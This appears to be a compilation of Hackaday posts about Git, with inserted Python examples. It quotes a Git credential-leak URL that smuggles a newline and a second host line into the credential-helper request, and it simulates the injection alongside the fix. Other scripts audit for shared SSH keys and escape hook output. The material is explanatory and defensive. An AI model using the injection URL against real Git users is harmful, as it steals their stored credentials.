This Week In Security: Git, Patch Tuesday, Anti-Cheat, And Vulnerable Documentation

Git released an update on Tuesday that fixes an issue which could leak stored credentials. The vulnerability was in how Git handled an HTTP URL containing a percent-encoded newline. Looking at the commits in 2.26.1, we can find an example of an attack:
url = "https://one.example.com?%0ahost=two.example.com/foo.git"

A git pull against that URL connects your Git client to one.example.com, the attacker's server, but the decoded newline splits the request Git hands to its credential helper into an extra line, host=two.example.com, and that injected line wins. The helper hands back the credentials it holds for two.example.com, and Git sends them to the attacker. Any host a helper has credentials cached for, GitHub for instance, could be targeted this way. So go make sure you have an updated Git client.
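To make the mechanism concrete, here is an added example (not Git's code, and not from the Hackaday post) that models the flaw in a few lines of Python: Git's credential protocol is line oriented, key=value per line with a blank line as terminator, so a newline smuggled into the host component becomes a second host= line. The pre-fix host extraction, the helper's "last key wins" parsing, the helper's credential store and the hardened check that refuses a host containing a newline are all simplifications written for this illustration; the hostnames and the stored token are constructed.

```python
from urllib.parse import unquote, urlsplit

# Constructed helper store: the only credentials this "helper" knows are for
# two.example.com. In the attack, one.example.com is the attacker's host.
HELPER_STORE = {"two.example.com": ("alice", "token-for-two")}


class UnsafeUrl(ValueError):
    """Raised by the hardened path when a URL component carries a newline."""


def host_component_pre_fix(url):
    # Models the pre-fix behaviour: the host is everything between "://" and
    # the first "/", percent-decoded, with no check for control characters.
    # (A simplified model, not Git's actual parser in credential.c.)
    _, _, rest = url.partition("://")
    host, _, _ = rest.partition("/")
    return unquote(host)


def credential_request(url, hardened):
    """Build the newline-delimited request Git writes to a credential helper."""
    host = host_component_pre_fix(url)
    if hardened and any(c in host for c in "\r\n"):
        # What the fixed releases do: refuse the URL rather than let a decoded
        # newline split one protocol line into two.
        raise UnsafeUrl(f"refusing URL with newline in host component: {url!r}")
    return f"protocol=https\nhost={host}\n\n"


def helper_answer(request):
    """Parse the request as a helper does: key=value per line, blank line ends
    the request, and a repeated key overwrites the earlier value."""
    attrs = {}
    for line in request.split("\n"):
        if line == "":
            break
        key, _, value = line.partition("=")
        attrs[key] = value
    host = attrs.get("host")
    return host, HELPER_STORE.get(host)


def simulate(url, hardened=False):
    """Return (host the transport connects to, host the helper was asked for,
    credentials the helper returned)."""
    connect_host = urlsplit(url).hostname  # the transport resolves the URL correctly
    asked_host, creds = helper_answer(credential_request(url, hardened))
    return connect_host, asked_host, creds


if __name__ == "__main__":
    attack = "https://one.example.com?%0ahost=two.example.com/foo.git"
    print("pre-fix:", simulate(attack))
    try:
        simulate(attack, hardened=True)
    except UnsafeUrl as err:
        print("fixed:  ", err)
```

The pre-fix run shows the mismatch the article describes: the connection goes to one.example.com while the helper is asked for, and returns, the credentials of two.example.com. The hardened path rejects the URL outright, which is the right response; sanitising the value would still leave the helper's answer bound to the wrong host.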

Hackaday Links: April 5, 2020

Git is powerful, but with great power comes the ability to really bork things up. When you find yourself looking at an inscrutable error message after an ill-advised late-night commit, it can be a maximum pucker-factor moment, and keeping a clear enough head to fix the problem can be challenging. A little proactive social engineering may be in order, which is why Jonathan Bisson wrote git-undo, a simple shell script that displays the most common un-borking commands he’s likely to need. There are other ways to prompt yourself through Git emergencies, like Oh Shit, Git (or for the scatologically sensitive, Dangit Git), but git-undo has the advantage of working without an Internet connection.

Suddenly find yourself with a bunch of time on your hands and nothing to challenge your skills? Why not try to write a program in a single Tweet? The brainchild of Dominic Pajak, the BBC Micro Bot Twitter account accepts tweets and attempts to run them as BASIC programs on a BBC Microcomputer emulator, replying with the results of the program. It would seem that 280 characters would make it difficult to do anything interesting, but check out some of the results. Most are graphic displays, some animated, and with an unsurprising number of nods to 1980s pop culture. Some are truly impressive, though, like Conway’s Game of Life written by none other than Eben Upton.

The COVID-19 pandemic is causing all sorts of cultural shifts, but we didn’t expect to see much change in the culture of a community that’s been notoriously resistant to change for over a century: amateur radio. One of the most basic facts of life in the amateur radio world is that you need a license to participate, with governments regulating the process. But as a response to the pandemic, Spain has temporarily lifted licensing requirements for amateur radio operators. Normally, an unlicensed person is only allowed to operate on amateur bands under the direct supervision of a licensed amateur. The rules change allows unlicensed operators to use a station without supervision and is intended to give schoolchildren trapped at home an educational experience. In another change, some countries are allowing special callsign suffixes, like “STAYHOME,” to raise awareness during the pandemic. And the boom in interest in amateur radio since the pandemic started is remarkable; unfortunately, finding a way to take your test in a socially distant world is quite a trick. Our friend Josh Nass (KI6NAZ) has some thoughts about testing under these conditions that you might find interesting.

And finally, life goes on during all this societal disruption, and every new life deserves to be celebrated. And when Lauren Devinck made her appearance last month, her proud parents decided to send out unique birth announcement cards with a printed circuit board feature. The board is decorative, not functional, but adds a distinctive look to the card. The process of getting the boards printed was non-trivial; it turns out that free-form script won’t pass most design rule tests, and that panelizing them required making some compromises. We think the finished product is classy, but can’t help but think that a functional board would have really made a statement. Regardless, we welcome Lauren and congratulate her proud parents.

GitHub On The Go

It is hard to find anyone who does any kind of software development and has no interaction with GitHub. Even if you don't host your own projects there, there are so many things to study and borrow on the site that it is nearly ubiquitous. However, when you've needed GitHub on the run, you've probably had to turn to your phone's browser and put up with a reduced experience. GitHub for Mobile is now out of beta and promises a more fluid phone-based GitHub experience.

In addition to working with tasks and issues, you can also review and merge pull requests. The app sends your phone notifications, too, which can be handy. As you might expect, you can get the app for Android or iPhone in the respective stores.


Reaching Serenity: Porting Git To A Homebrew Operating System

Life is all about the little joys — such as waking up in the morning and realizing there’s still plenty of time before you have to actually get up. Or getting up anyway to watch a delightful sunrise as the city slowly wakes up, or as [Andreas Kling] chose, porting your favorite development tool to the operating system you wrote.

With the aesthetics of '90s UI design and the functionality of a simpler 2000s Unix-style system core in mind, and personal reasons to keep himself busy, [Andreas] started SerenityOS a little while back. Of course, writing your own operating system is always a great educational exercise, but it takes a certain amount of commitment to push it beyond the experimental playground phase. Ideally, you'd eventually want to use it as your actual main system; however, as a software developer, [Andreas] was missing one crucial component for that: git. Well, he decided to change that and just port it, and as someone who likes to record his hacking sessions, you can watch him along the way.

Admittedly, watching someone tweak build tools and compiler settings would normally sound anything but exciting, but it adds a few more layers when it is done for a work-in-progress OS written from scratch: from digging into libc implementations to an almost reverse-engineering approach to the build environment. If you take pleasure in following people's thought process in problem solving and (spoiler alert) their success, you will enjoy watching [Andreas]. On the other hand, if you're more curious about a fresh approach to a desktop operating system, SerenityOS itself might be worth looking into. Of course, there are other options for that as well.


GitHub Goes GUI-less

Git is a handy tool that many of us are using for more than just software development. Having a cloud-based upstream repository is also surprisingly useful, but until now using GitHub — the most common upstream server — meant firing up a web browser, at least for certain tasks. Now GitHub is releasing a beta version of command-line tools made to manipulate your GitHub repos.

The tools are early release so they mostly focus on issues and pull requests. Of course, git itself will do the normal things like clone and checkout — you’ve always been able to do that on the command line. The example given in the announcement blog post lists all issues with a help wanted label:

gh issue list --label "help wanted"

We noticed that asking to view the issue, while done on the command line, will still open a browser. The tools are still a little early, so this is an excellent time to let the developers know what you’d like or otherwise influence the project.

We were a little surprised it wouldn’t just consume git, so that you’d use the same commands for everything and it would just pass pre-formed commands to git. Of course, that would be pretty easy to write as a shell script wrapper if you were interested in such a thing.

You’d be forgiven for only thinking of git as a way to manage source code revisions, but it’s actually capable of all sorts of interesting tricks.

This Week In Security: Backdoors In Cisco Switches, PGP Spoofing In Emails, Git Ransomware

Some switches in Cisco's Nexus 9000 series (running in ACI mode) are susceptible to a remote vulnerability, CVE-2019-1804. It's a bit odd to call it a vulnerability, actually, because the software is operating as intended: Cisco shipped these switches with the same SSH key pair baked into the software image on every unit, and that key is accepted for root login. Anyone who has extracted the private key from one image can log in as root on any of these switches.

Cisco makes a strange claim in their advisory: that this is only exploitable over IPv6. That seems very odd, as nothing about SSH or public-key authentication is IPv6 specific. It suggests there may be another blunder, perhaps that the SSH service was accidentally left reachable from the world on IPv6 only. Another possibility is that Cisco is assuming all of these switches sit safely behind NAT routers and are therefore unreachable over IPv4. One of the advantages (or disadvantages) of IPv6 is that it was designed without NAT, so every device typically has a globally routable address and is reachable from outside the network. (Reachable in the sense that a route exists; firewalling is still possible, of course.)

It's staggering how many devices, even high-end commercial devices, are shipped with unintentional yet effective backdoors just like this one.
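The check a practitioner wants after a story like this is whether the same key is trusted on more than one machine in their own fleet, which is exactly the condition Cisco shipped. The script below is an added example, not Cisco's or Hackaday's code. It fingerprints OpenSSH public-key lines the way ssh-keygen -lf does (SHA256 over the base64 key blob, printed as unpadded base64), tolerates the option prefix authorized_keys allows (command="...", from="..."), and reports any fingerprint that appears in more than one host's authorized_keys. The inventory and the key blobs are constructed placeholders, not real keys; in practice you would collect each device's root authorized_keys (and its host keys via ssh-keyscan, which shows the same problem from the other side) and feed them in.

```python
import base64
import hashlib

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521")


def fingerprint(pubkey_line):
    """SHA256 fingerprint of an OpenSSH public-key line, formatted like
    ssh-keygen -lf. Scans for the key-type token so lines with an options
    prefix (command=..., from=...) are handled too."""
    fields = pubkey_line.split()
    for i, field in enumerate(fields[:-1]):
        if field in KEY_TYPES:
            blob = base64.b64decode(fields[i + 1], validate=True)
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError("not an OpenSSH public-key line: %r" % pubkey_line)


def constructed_key(label):
    # Placeholder key for the demo: the blob is deterministic bytes derived
    # from the label, not a real RSA key. That is enough to exercise
    # fingerprinting and matching without shipping key material.
    blob = hashlib.sha256(label.encode()).digest() * 2
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + label


# Constructed inventory: host name -> contents of root's authorized_keys.
# "vendor-default" stands in for a key baked into every unit's image.
INVENTORY = {
    "switch-a": constructed_key("vendor-default") + "\n" + constructed_key("ops-alice"),
    "switch-b": constructed_key("vendor-default") + "\n# comment\n" + constructed_key("ops-bob"),
    "switch-c": constructed_key("vendor-default"),
}


def keys_by_host(inventory):
    """Map each key fingerprint to the set of hosts that authorize it."""
    seen = {}
    for host, content in inventory.items():
        for line in content.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            seen.setdefault(fingerprint(line), set()).add(host)
    return seen


def shared_keys(inventory, threshold=2):
    """Fingerprints authorized on at least `threshold` hosts, with those hosts."""
    return {fp: sorted(hosts) for fp, hosts in keys_by_host(inventory).items()
            if len(hosts) >= threshold}


if __name__ == "__main__":
    for fp, hosts in shared_keys(INVENTORY).items():
        print(f"{fp} is authorized on {len(hosts)} hosts: {', '.join(hosts)}")
```

A key that legitimately belongs on several hosts (a deployment key for an automation account) will show up too, so treat the output as a list to justify, not a list of incidents; anything you cannot attribute to a named owner is the Cisco case.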

Easy Git Repository Summaries With Web-git-sum

For those hosting their own git repositories there are a number of solutions for creating convenient web-accessible front ends, but [mitxela] wasn't quite satisfied with any of them. After trying a number of alternatives and reflecting on his requirements, he realized that all he really needed was a summary page listing the latest commits, and a file tree with a list of branches and tags. To accomplish this, he created web-git-sum. It's a bash script that runs from git's post-receive hook and generates only two files: a summary page and an index of the repository. You can see a demo of the output at git.mitxela.com.
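To show what such a hook is handed and what it has to be careful with, here is an added example in Python, not [mitxela]'s bash script and reduced to a single summary file. Git runs post-receive after a push with one "oldrev newrev refname" line per updated ref on stdin, and the all-zero SHA marks a ref being created or deleted. The script classifies those updates, pulls the latest commits from git log, and writes summary.html. Ref names, author names and commit subjects are all chosen by whoever pushed, so anything that lands in the HTML is escaped first; the output filename and commit limit are assumptions for this example.

```python
#!/usr/bin/env python3
"""Minimal post-receive hook: write summary.html for the refs just pushed."""
import html
import subprocess
import sys
from pathlib import Path

ZERO_SHA = "0" * 40  # git's "no object" value on ref creation or deletion


def parse_post_receive(stdin_text):
    """Parse the 'oldrev newrev refname' lines git feeds a post-receive hook."""
    updates = []
    for line in stdin_text.splitlines():
        if not line.strip():
            continue
        old, new, ref = line.split()
        if old == ZERO_SHA:
            kind = "created"
        elif new == ZERO_SHA:
            kind = "deleted"
        else:
            kind = "updated"
        updates.append((ref, kind, old, new))
    return updates


def recent_commits(repo, ref, limit=10):
    """Latest commits on ref as (hash, author, subject). Fields are separated
    by a unit-separator byte so subjects containing spaces stay intact."""
    out = subprocess.run(
        ["git", "-C", repo, "log", f"--max-count={limit}",
         "--format=%H%x1f%an%x1f%s", ref, "--"],
        check=True, capture_output=True, text=True).stdout
    return [tuple(line.split("\x1f", 2)) for line in out.splitlines()]


def render_summary(repo_name, updates, commits):
    """Build the page. Every value here arrived in a push, so escape all of it
    before it becomes markup, or a commit subject becomes a script tag."""
    refs = "".join(f"<li>{html.escape(ref)}: {kind}</li>"
                   for ref, kind, _, _ in updates)
    log = "".join(
        f"<li><code>{html.escape(sha[:12])}</code> "
        f"{html.escape(author)}: {html.escape(subject)}</li>"
        for sha, author, subject in commits)
    return (f"<h1>{html.escape(repo_name)}</h1>"
            f"<h2>Pushed refs</h2><ul>{refs}</ul>"
            f"<h2>Latest commits</h2><ul>{log}</ul>\n")


def main():
    updates = parse_post_receive(sys.stdin.read())
    live = [u for u in updates if u[1] != "deleted"]
    commits = recent_commits(".", live[0][0]) if live else []
    # Hooks run with the repository directory as the working directory.
    Path("summary.html").write_text(render_summary(Path.cwd().name, updates, commits))


if __name__ == "__main__":
    main()
```

Install it as hooks/post-receive in the bare repository and make it executable. The escaping is the part worth copying into any front end of this kind: a commit message is untrusted input the moment the repository accepts pushes from more than one person.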

[mitxela]’s writeup goes into some detail on how git repositories work, how those repositories are served over HTTP, and covers a few of the different options for providing convenient and accessible web front ends. Not all repositories are alike, and what works well for one may not work or scale well for another.

Intrigued by the idea of a private git server? We covered exactly how to set one up (spoiler: it’s really easy.)